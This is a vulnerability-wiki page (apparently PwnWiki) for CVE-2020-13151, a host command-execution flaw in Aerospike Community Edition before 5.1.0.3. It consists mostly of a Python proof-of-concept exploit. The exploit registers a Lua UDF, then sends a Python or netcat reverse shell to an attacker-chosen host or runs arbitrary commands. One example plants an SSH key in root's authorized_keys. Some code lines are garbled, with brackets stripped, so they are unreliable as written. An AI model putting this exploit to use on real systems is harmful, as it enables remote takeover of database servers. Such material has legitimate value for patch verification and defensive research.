Loading
0

CVE-2020-13151 Aerospike 数据库主机命令执行漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

漏洞影响

Aerospike 社区版 \<5.1.0.3

POC

#!/usr/bin/env python3
import argparse
import random
import os, sys
from time import sleep
import string
# requires aerospike package from pip
import aerospike
# if this isn't installing, make sure os dependencies are met
# sudo apt-get install python-dev
# sudo apt-get install libssl-dev
# sudo apt-get install python-pip
# sudo apt-get install zlib1g-dev
PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call("/bin/sh","-i");'&"""
NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'
def _get_client(cfg):
    try:
        return aerospike.client({
            'hosts': (cfg.ahost, cfg.aport),
             'policies': {'timeout': 8000}}).connect()
    except Exception as e:
        print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
def _send(client, cfg, _cmd):
    try:
        print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', _cmd))
    except Exception as e:
        print(f"- UDF execution returned {e.msg}")
def _register_udf(client, cfg):
    try:
        client.udf_put(cfg.udfpath)
    except Exception as e:
        print(f"- whoops, couldn't register the udf {cfg.udfpath}")
        raise e
def _random_string(l):
    return ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l))
def _populate_table(client, cfg):
    ns = cfg.namespace
    setname = cfg.setname
    print(f"+ writing to {ns}.{setname}")
    try:
        rec = cfg.dummystring
        client.put((ns, setname, rec), {'pk':cfg.dummystring})
        print(f"+ wrote {rec}")
    except Exception as e:
        print(f"- unable to write record: {e.msg}")
        try:
            if e.msg.startswith('Invalid namespace'):
                print("Valid namespaces: ")
                for n in _info_parse("namespaces", client).split(";"):
                    print(n.strip())
        except:
            pass
        sys.exit(13)
def _info_parse(k, client):
    try: 
        return i1 for i in client.info_all(k).values() 0
    except Exception as e:
        print(f"error retrieving information: {e.msg}")
        return 
def _is_vuln(_mj, _mi, _pt, _bd):
    fixed = 5,1,0,3
    found = _mj, _mi, _pt, _bd
    if fixed == found:
        return False
    for ix, val in enumerate(found):
        if val < fixedix:
            return True
        elif val == fixedix:
            pass
        else:
            return False
def _version_check(client):
    print("+ aerospike build info: ", end="")
    try:
        _ver = _info_parse("build", client)
        print(_ver)
        mj, mi, pt, bd = int(i) for i in _ver.split('.')
        if _is_vuln(mj, mi, pt, bd):
            print("+ looks vulnerable")
            return
        else:
            print(f"- this instance is patched.")
            sys.exit(0)
    except Exception as e:
        print(f"+ unable to interpret build number due to {e}")
        print("+ continuing anyway... ")
def _exploit(cfg):
    client = _get_client(cfg)
    if not client:
        return
    _version_check(client)
    print(f"+ populating dummy table.")
    _populate_table(client, cfg)
    print(f"+ registering udf")
    _register_udf(client, cfg)
    if cfg.pythonshell or cfg.netcatshell:
        sys.stdout.flush()
        print(f"+ sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
        sys.stdout.flush()
        for i in range(4): 
            print(".", end="")
            sys.stdout.flush()
            sleep(1)
        print(".")
        _send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
    if cfg.cmd:
        print(f"+ issuing command \"{cfg.cmd}\"")
        _send(client, cfg, cfg.cmd)
if __name__ == '__main__':
    if len(sys.argv) == 1:
        print(f"+ usage examples:\n{sys.argv0} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
        print("... or ... ")
        print(f"{sys.argv0} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
        sys.exit(0)
    parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
    parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
    parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
    parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
    parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
    parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
    parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
    parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
    parser.add_argument("--lhost", help="host to use for reverse shell callback")
    parser.add_argument("--lport", help="port to use for reverse shell callback")
    parser.add_argument("--cmd", help="custom command to issue against the underlying host")
    parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
    cfg = parser.parse_args()
    if not cfg.setname:
        cfg.setname = 'cve202013151'
    if not cfg.dummystring:
        cfg.dummystring = _random_string(16)
    if not cfg.udfpath:
        cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
    assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
    if cfg.pythonshell or cfg.netcatshell:
        assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
    _exploit(cfg)

免费、自由、人人可编辑的漏洞库--PwnWiki.com